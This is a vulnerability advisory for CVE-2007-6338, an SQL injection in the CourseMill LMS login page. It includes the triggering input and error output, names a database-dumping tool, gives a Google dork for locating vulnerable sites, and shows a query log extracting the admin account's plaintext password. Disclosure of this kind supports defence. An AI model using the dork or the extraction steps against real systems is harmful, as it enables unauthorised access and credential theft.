+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338

+==================================================================================================+
+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 +
+==================================================================================================+

DISCOVERED BY:
==============
sasquatch of SecureState - swhite@xxxxxxxxxxxxxxx

HOMEPAGE:
=========
www.securestate.com

AFFECTED AREA:
==============
The username field on the login page is susceptible to SQL injection...

http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.

Impact: Full data dump of underlying database ---> Username/Passwords ~~~> ???

username: '
password: test

An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.

EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.

This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx

The logins are unencrypted and stored in the "Admin" table. Column names are: ID, LastLogin, OrgId, Passsword.

This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible.

CONFIRMED AGAINST:
==================
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)


EXAMPLE GOOGLEDORK:
===================
"Trivantis and CourseMill are registered trademarks of Trivantis"


VENDOR INFORMATION:
===================
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com

Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.


Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin...
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin

Etc...

and proceeds to dump the entire database...

Relevant Pages

  • Re: Summing time worked by an individual on a weekly basis
    ... query going without the inapplicable records in the other tables change ... TypeOfTime (Toil, Lunch, Holiday, TravelTo, TravelFrom, Etc.) ... bulk of activities undertaken by the team) - Admin, ... which pull out the data for each adviser from each table and then adds ...
    (microsoft.public.access.queries)
  • Re: Search sub-form without writing exactly what is contained in query field
    ... will this work if say I type 'Admin' and 'Finance' in the same ... firstly I want to search all staff who have 'finance' ... Is there a way of searching a sub-form (reading from a query) without ... Manager' and 'Finance Manager' appeared as part of the results? ...
    (comp.databases.ms-access)
  • Re: Query that calls value from one table field to another table f
    ... Table Name: Admin ... "Jeff Boyce" wrote: ... I may not use the same definition of the term "populate". ... query is run. ...
    (microsoft.public.access.queries)
  • Re: Queries & table locking
    ... as users do not use the database; it simply serves as a source for ... interprets the current user as admin. ... The query is a make-table query, ... If instead of running a make-table query, ...
    (microsoft.public.access.queries)
  • Unbound field results are different then Query w/the same criteria
    ... functions of the admin FE will be to use the "Questions Selection Form" ... In the Eval FE I have a form based on a query with both QL and Q ... There is an Unbound field for each Question, ...
    (microsoft.public.access.formscoding)